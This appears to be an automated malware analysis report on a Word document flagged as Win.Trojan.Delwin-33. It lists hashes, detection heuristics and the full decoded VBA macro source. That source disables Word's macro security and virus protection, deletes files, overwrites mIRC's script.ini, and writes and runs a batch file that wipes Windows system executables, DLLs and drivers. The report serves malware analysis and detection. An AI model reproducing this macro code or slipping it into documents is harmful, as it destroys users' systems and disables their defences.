Win.Trojan.Delwin-33 — Office (OLE) malware analysis

Static analysis result for SHA-256 02b6db994765785d…

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-08-30 13:03:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: c67f4e272c57c054e9649d8313022fba SHA-1: 129fa96c5bfa2bdd6003ad2c77ffa8decd24c559 SHA-256: 02b6db994765785d3f78db27c6876b18c76bffe6452a844aa59800e7d2f80ae7
320 Risk Score

Malware Insights

Win.Trojan.Delwin-33 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Office document contains VBA macros that execute automatically upon opening, as indicated by the Document_Open heuristic. The macros attempt to disable security features and write a file named 'peak.txt' to C:\WINDOWS\. The presence of Shell() calls and CreateObject suggests the execution of arbitrary code, likely to download and run a secondary payload. The ClamAV detection of 'Win.Trojan.Delwin-33' further supports its malicious nature.

Heuristics 6

  • ClamAV: Win.Trojan.Delwin-33 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Delwin-33
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2945 bytes
SHA-256: 1807d7c36d97af1993d032019df6ddfa9e07ead9068063b340a1a2e4a49cb881
Detection
ClamAV: Win.Trojan.DelFil-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Document_Open()
On Error Resume Next
Open "C:\WINDOWS\peak.txt" For Output As #1
Print #1, "Peak"
Close #1
MsgBox "hi welcome to new virus peak"
End Sub

Sub Stealth()
Set fs = Application.FileSearch
es$ = "xdez.txt"
With fs
.LookIn = "C:\Program Files"
.SearchSubFolders = True
.FileName = es$
If .Execute > 0 Then
MsgBox "File Found"
Set ds = CreateObject("Scripting.FileSystemObject")
Object
Set fy = ds.GetFile(es$)
h = (fy.Path)
SetAttr h, vbNormal
Kill (h)
MsgBox "whats hapeening"
Else
MsgBox "del del del"
End If
End With
End Sub

Sub Document_Open()
CommandBars("Macro").Controls("Security...").Enabled = 0
CommandBars("Macro").Controls("Macros...").Enabled = 0
CommandBars("Tools").Controls("Customize...").Enabled = 0
CommandBars("View").Controls("Toolbars").Enabled = 0
CommandBars("View").Controls("Status Bar").Enabled = 0
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
CommandBars("Format").Controls("Style...").Enabled = 0
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
End Sub

Sub InfectMirc()
infe$ = "c:\mirc\script.ini"
Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists(infe$) Then GoTo mircwrite Else GoTo fling
mircwrite:
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[Script]"
Print #1, "n0;Miniscript"
Print #1, "n1= ON 1:JOIN:#:{ /exit } "
Print #1, "n2= ON 1:*xde*:#:{ /exit };"
Close #1
SetAttr "c:\mirc\script.ini", vbReadOnly
GoTo finish
fling:
MsgBox "Invalid Memory Space", vbCritical
finish:
End Sub

Private Sub Form_Load()
On Error Resume Next
Open "C:\WINDOWS\peak2.txt" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "@del C:\windows\*.ini"
Print #1, "cls"
Print #1, "@del C:\windows\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.scr"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.drv"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.dll"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.sys"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system.ini"
Close #1
Name "C:\WINDOWS\peak2.txt" As "C:\WINDOWS\peak2.bat"
Shell "C:\WINDOWS\peak2.bat"
MsgBox "ur pc is gone", vbCritical
Kill "C:\WINDOWS\peak2.bat"
End
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.